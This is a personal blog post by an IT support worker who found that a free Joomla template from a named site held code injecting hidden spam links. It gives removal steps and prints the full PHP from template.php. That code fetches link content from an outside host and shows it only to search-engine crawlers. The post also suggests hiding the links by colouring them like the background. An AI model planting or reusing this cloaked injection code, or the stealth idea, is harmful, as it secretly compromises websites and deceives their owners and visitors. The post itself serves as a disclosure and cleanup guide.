I took a job about a year ago with a equipment dealership as their IT support person. My job basically consists of handling any computer related issues they may have such as software & hardware installations and upgrades, network administration, security, you name it. One of the other things I was put in charge of was their website. I had some experience with website development prior to coming on board but I had never really been a bonafide webmaster before where I actually got paid for doing it. So I setup a new hosting account with Dreamhost and I played around with Drupal and Joomla to kind of figure out which one I wanted to go with. I selected Joomla because I had the most experience with it and I found more templates for it that I liked. I finally settled on a template called Liberty from this website, http://joomlatemplates.me/. It was a free template but I liked the looks of it and thought I could make a pretty decent looking site from it.

Well, things were going along fine and the site was getting tweaked and improved over time when one day I see these links appear at the base of the home page during one of my many times of checking things over. They looked like Italian words to me so I did a Google search for them and discovered lots of websites with those exact same words. I started clicking links to look at the sites and every single one of them was using the same template as me. My first thoughts were that the template had some vulnerability in the code somewhere that someone had taken advantage of and I contacted the template developer about my situation only to never hear back from them. Finally, I tracked down where my problem was coming from and it looks like it was built right into the template by the author. I went back to his website and checked some of the other templates he had and they all had the same code inserted into the files. So I don’t know if this was deliberate or if his site was compromised but I certainly couldn’t have spam links showing up on our business site. My goal is to develop our own Joomla template for the next site update which is probably going to come sooner than I had originally planned, but the fix for my current problem was fairly easy to fix.

First start with the index.php file in the templates root directory and remove the line referencing templates.php. In my template it was under the #comp-wrap div section.

<code>

<div id="comp-wrap"> 
 <jdoc:include type="message" />
 <jdoc:include type="component" />
 <?php include "html/template.php"; ?> 
 </div>

</code>

Then under the html directory remove the files template.php and mods.php. That’s it.

This is the code from the template.php file:

<code>

<?php
ini_set('display_errors',0);
$path = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$path = str_replace("&", "",$path);
$target = dirname(__FILE__) . DIRECTORY_SEPARATOR . "mods.php";
$source = 'http://psdu.net/me3.php?i='.$path;
$cachetime = 86400;
if ((file_exists($target)) && (time() - $cachetime) > filemtime($target)) { 
$string = file_get_contents($source);$result = file_put_contents($target, $string);}
$spiders = array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
$credits = file_get_contents($target);
$uagent = $_SERVER['HTTP_USER_AGENT'];
foreach ($spiders as $spider){if (preg_match("/$spider/",$uagent)){echo $credits;}}
?>

</code>

What the above code does is grabs the page url and passes it as a random generator seed to  the website psdu.net to retrieve new spam links. It then checks if the mods.php has been changed in the last 24 hours and if not, writes the new spam links to mods.php. Then it waits for one of the search bots to show up to index the site and it plugs in the links so they will be indexed with the page.  If the website’s cache is set to clear at a certain interval like mine is, then the links would be cleared away, making it really hard to catch them. If the guy was really smart he would have checked the background color of the div section and made the link text the same color. Then the links would have been invisible to the observer while they were still being published on the page. If he had done that, I probably never would have caught this at all!

My aim here is to give a heads up to anyone else using this guys templates, certainly not to teach anyone how to publish spam links in secret code. I myself, take the trust placed in me with peoples computers and data very seriously and I would hope that others in my field would too, but that’s unfortunately not the case. I just hope this helps someone else who may be searching just like I was for an answer to what was going on with my website.

Cheers!